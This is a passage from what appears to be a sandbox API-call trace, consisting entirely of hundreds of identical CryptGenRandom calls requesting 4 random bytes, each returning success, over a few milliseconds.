hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.030] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.031] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.032] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.033] CryptGenRandom 